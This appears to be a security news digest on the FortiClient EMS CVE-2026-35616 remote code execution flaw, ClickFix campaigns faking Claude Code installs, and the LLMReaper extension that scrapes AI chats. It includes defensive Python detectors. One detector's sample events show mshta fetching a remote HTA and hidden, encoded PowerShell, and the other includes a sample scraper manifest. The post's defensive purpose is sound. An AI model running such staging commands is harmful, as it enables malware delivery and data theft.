2026-06-02

FortiClient RCE Active , Claude Code ClickFix , LLMReaper St

CVE-2026-35616 is an unauthenticated CVSS 9.8 RCE in FortiClient EMS 7.4.5–7.4.6, actively exploited and chained with CVE-2026-21643. ClickFix campaigns are impersonating Claude Code installs via SEO poisoning. LLMReaper, a Chrome extension PoC, scrapes live ChatGPT/Claude/Gemini conversations via DOM injection. The attack surface now lives wherever an AI tool touches an endpoint.
Three security stories, one shared pattern: the attack surface now lives wherever an AI tool touches an endpoint. CVE-2026-35616 is an unauthenticated RCE chain in FortiClient Enterprise Management Server with a CVSS of 9.8 and active in-the-wild exploitation. A ClickFix campaign is impersonating the Claude Code installation page to drop infostealers on developer Macs. And a Chrome extension called LLMReaper is scraping live ChatGPT, Claude, and Gemini conversations in real time. The common thread is that "AI tool" and "trusted software" are no longer different categories, and the threat model has to change accordingly.

What You Need to Know

CVE-2026-35616 is an improper-access-control flaw in FortiClient EMS 7.4.5–7.4.6 that lets an unauthenticated attacker execute code on the management server over HTTPS (CVSS 9.8). It's actively exploited and chained with CVE-2026-21643, another EMS flaw. Multiple threat researchers have published ClickFix-style campaigns that impersonate the Claude Code installer and use SEO poisoning and mshta-style staging to drop infostealers on developer machines. A Chrome extension called LLMReaper was published this week demonstrating how to scrape every conversation from ChatGPT, Claude, and Gemini in real time by injecting content scripts into the AI web UIs.

Why It Matters

  • For security teams: If you run FortiClient EMS, patch 7.4.5/7.4.6 now and audit for IOCs. Unauthenticated, over-HTTPS, no user interaction, CVSS 9.8 — this is as bad as it gets.
  • For SOC analysts: CVE-2026-35616 is being chained with CVE-2026-21643 (an XSS / session-fixation class issue), so the kill chain is post-auth pivot from a pre-auth foothold. Treat the two as one bug.
  • For developers: "ClickFix" and "InstallFix" are the new phishing taxonomy. The payload is a fake AI tool install, the vector is a Google search result. The training has to extend to "did you actually navigate to the vendor's site?"
  • For browser security: LLMReaper shows that AI web UIs are now a viable exfiltration target. Any conversation you have in ChatGPT/Claude/Gemini is reachable from a malicious extension.
  • For AI vendors: The ClickFix and LLMReaper stories both depend on a trust gap between the official tool and the threat-actor-replica. Code signing, signed installer hashes, and verified-download pages are no longer nice-to-haves.

What Actually Happened

FortiClient EMS CVE-2026-35616 — unauthenticated RCE, actively exploited

On April 3, 2026, NVD published CVE-2026-35616: an "improper access control" vulnerability in Fortinet FortiClientEMS versions 7.4.5 through 7.4.6 that allows an unauthenticated attacker to execute arbitrary code on the management server. Exploitation goes through the EMS web interface over HTTPS and needs no credentials. The CVSS is 9.8, and it has been observed being exploited in the wild, frequently chained with CVE-2026-21643 (a session / XSS-class issue in the same product) for post-auth pivot. Horizon3.ai's technical writeup walks through the API authentication bypass; Bishop Fox's analysis covers the exploit surface. Greenbone's blog has a clean summary and patch-now framing. The Penligent attack-lab post walks through the auth-bypass mechanics in detail.

The TL;DR for any team running FortiClient EMS: patch to 7.4.7 (or later) immediately, audit for IOCs from the Greenbone and Bishop Fox posts, and assume the management plane is compromised until you've validated otherwise. EMS sits on the endpoint-management plane, so a pre-auth RCE there is functionally a pre-auth RCE on every endpoint that talks to it. The 7.4.5–7.4.6 window is roughly 8 months of exposure.

"Claude Code install" search-result campaigns are the new ClickFix

Multiple research teams have published ClickFix-style campaigns that impersonate the Claude Code installation flow. SC World and Help Net Security document the pattern: SEO-poisoned search results for "claude code install" or "claude code setup" lead to fake install pages that prompt the user to run a command. The command uses mshta to stage PowerShell and process injection, ultimately dropping an infostealer. Malwarebytes found a Mac-focused variant in May 2026 that lures Mac users with fake Claude setup guides. Rapid7's writeup covers the broader ClickFix mechanics. 7AI also published research on a related campaign called "Claude Fraud" (fake Claude AI pages and a trojanized VS Code extension).

The pattern isn't new (ClickFix has been around for two years), but the application to AI dev tools is. The threat actor is exploiting the gap between "the developer Googled it" and "the developer navigated to the vendor's actual install page." The defensive answer is procedural: a written rule in your team that AI tool installs always go through the vendor's verified domain, never through a search-result click. The threat model's changed — phishing isn't just email anymore.
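A defender-side illustration of the staging chain described above, added here and not taken from any of the cited reports: a small classifier over constructed process-creation events that flags mshta fetching a remote HTA from a paste-and-run parent and mshta spawning PowerShell. The process-name sets, the event field layout and the sample telemetry are assumptions for this example.

```python
import re

# Assumed process names for the chain described above: the user runs the pasted
# command (Run dialog or browser download, parented by explorer.exe or the browser),
# mshta fetches a remote HTA, and mshta spawns PowerShell. These sets are
# assumptions for this example, not a vendor signature.
PASTE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
STAGERS = {"mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
REMOTE_URL = re.compile(r"(?i)\bhttps?://")
ENC_FLAG = re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s")

def classify(event):
    """Return a finding for one process-creation event (dict with parent, image,
    cmdline; image names without paths), or None if it looks benign."""
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    # Stage 1: mshta launched from a paste-and-run parent with a remote HTA URL.
    if parent in PASTE_PARENTS and image in STAGERS and REMOTE_URL.search(cmd):
        return f"{parent} -> {image} fetching remote HTA: {cmd}"
    # Stage 2: mshta spawning PowerShell, optionally with an encoded command.
    if parent in STAGERS and image in SHELLS:
        hint = " (encoded command)" if ENC_FLAG.search(cmd) else ""
        return f"{parent} -> {image}{hint}: {cmd}"
    return None

def scan(events):
    """Run classify over a list of events and keep the findings, in order."""
    return [f for f in map(classify, events) if f]

# Constructed sample telemetry (not real logs); only the second and third events match.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "chrome.exe", "cmdline": "chrome.exe"},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/claude-setup.hta"},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc AAAA"},
    {"parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell.exe -File build.ps1"},
    {"parent": "explorer.exe", "image": "mshta.exe", "cmdline": "mshta.exe C:\\local\\app.hta"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A local HTA with no URL (last event) and PowerShell launched from cmd.exe are left alone, so the rule stays narrow to the remote-staging shape the campaign uses.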

LLMReaper: a Chrome extension that scrapes ChatGPT, Claude, and Gemini

A Chrome extension called LLMReaper was published this week (June 1, 2026) demonstrating how to scrape every conversation from ChatGPT, Claude, and Gemini in real time. The technique, as described in Kartik Trivedi's LinkedIn post, is DOM-based: a content script runs in the context of the AI web UI, scrapes the conversation history as it streams, and exfiltrates it. The point of the publication appears to be a defensive warning — any malicious extension with the right host_permissions can do the same thing. The implication for security teams is uncomfortable: any conversation you have in a browser-based AI UI is potentially reachable from a malicious browser extension. For AI vendors, the implication is that the trust boundary has to move from "is the page legit" to "is the browser context safe," which is a much harder problem.


The Take

The shared pattern across all three stories is that the attack surface now lives wherever an AI tool touches an endpoint. CVE-2026-35616 puts pre-auth RCE on the management plane that brokers every endpoint session. ClickFix for Claude Code puts the initial access vector on the developer's install ritual. LLMReaper puts a passive exfiltration channel on every conversation the developer has with an AI assistant. Three different layers, one underlying assumption collapse: "AI tool" and "trusted software" are not different categories anymore, and the threat model has to be updated accordingly.

The FortiClient EMS bug is the one with the shortest fuse. CVSS 9.8, no auth, no user interaction, actively exploited, and chained with a second CVE in the same product. If you're running 7.4.5 or 7.4.6, you should be working the patch right now, not at the next change window. The post-auth pivot via CVE-2026-21643 means a single unpatched EMS is functionally a pre-auth RCE on every endpoint that checks in to it. The IOCs from Bishop Fox and Greenbone are worth running across your environment even if you're already patched, to detect any historical exploitation.

The ClickFix-for-AI-tools wave is the one that needs a procedural answer, not a technical one. You can patch a CVE; you can't patch a developer's Google reflex. The fix is a one-line team rule: "AI tool installs always go through the vendor's verified domain." Make it a checkbox in your security onboarding. The threat actor's whole business model depends on the gap between "the developer wanted the tool" and "the developer navigated to the right URL." Closing that gap takes the campaign down to noise.

LLMReaper is the early warning of a category that will get worse, not better. The DOM-based scraping technique works against any AI web UI, and there are hundreds of Chrome extensions with the right host_permissions already installed in your developers' browsers. The right defensive answer for security teams is a strict allowlist for browser extensions in any environment that touches AI conversations involving customer data or proprietary code. The right defensive answer for AI vendors is to make conversations unreachable from arbitrary content scripts — same-origin policy tightening, CSP headers that block inline scripts, and ideally a desktop client that doesn't run in a browser at all.
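As an added example (not LLMReaper's code and not from the post above), a manifest.json auditor that supports the extension-allowlist review recommended here and the host_permissions point made earlier: it reports which extensions can reach the AI chat UIs, either through host_permissions or through an injected content script. The AI hostnames and the sample manifest are assumptions constructed for this example.

```python
import json

# Hostnames of the three browser-based AI UIs named in the post. The exact hostnames are
# an assumption for this example; extend the tuple with whatever your organisation uses.
AI_CHAT_HOSTS = ("chatgpt.com", "chat.openai.com", "claude.ai", "gemini.google.com")

def pattern_covers(pattern, host):
    """True if a Chrome match pattern ('*://*.claude.ai/*', '<all_urls>', ...) reaches host."""
    if pattern == "<all_urls>":
        return True
    host_part = pattern.split("://", 1)[-1].split("/", 1)[0]   # drop scheme and path
    if host_part == "*":
        return True
    if host_part.startswith("*."):
        base = host_part[2:]
        return host == base or host.endswith("." + base)
    return host_part == host

def audit_manifest(manifest):
    """List how one parsed manifest.json (MV2 or MV3) can reach the AI chat UIs:
    via host_permissions (page access from the extension) or via a content script
    injected into the page, which is the LLMReaper-style vector."""
    findings = []
    grants = list(manifest.get("host_permissions", []))
    # MV2 keeps host patterns inside "permissions"; keep only the URL-shaped entries.
    grants += [p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"]
    for host in AI_CHAT_HOSTS:
        for p in grants:
            if pattern_covers(p, host):
                findings.append(f"host_permissions reaches {host} via '{p}'")
        for cs in manifest.get("content_scripts", []):
            for m in cs.get("matches", []):
                if pattern_covers(m, host):
                    findings.append(f"content script {cs.get('js', [])} injected into {host} via '{m}'")
    return findings

# Constructed sample manifest in the shape an LLMReaper-style scraper would use (not the
# real extension's file): page access to two AI hosts plus a catch-all content script.
SAMPLE_MANIFEST = json.loads("""{
  "manifest_version": 3, "name": "demo-scraper",
  "host_permissions": ["*://*.claude.ai/*", "https://chatgpt.com/*"],
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["scrape.js"]}]
}""")

if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print(finding)
```

To audit a real browser profile, walk its unpacked extensions folder, json.load each manifest.json and pass it to audit_manifest; anything with findings should appear on the allowlist deliberately or be removed.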


Quick Summary

CVE-2026-35616 is an unauthenticated CVSS 9.8 RCE in FortiClient EMS 7.4.5–7.4.6, actively exploited and chained with CVE-2026-21643. ClickFix campaigns impersonating Claude Code installs are dropping infostealers via SEO-poisoned search results. LLMReaper, a Chrome extension proof-of-concept, scrapes live ChatGPT/Claude/Gemini conversations via DOM injection. The attack surface now lives wherever an AI tool touches an endpoint.


Source: TLDR | mr.technology — The Master Skill Index
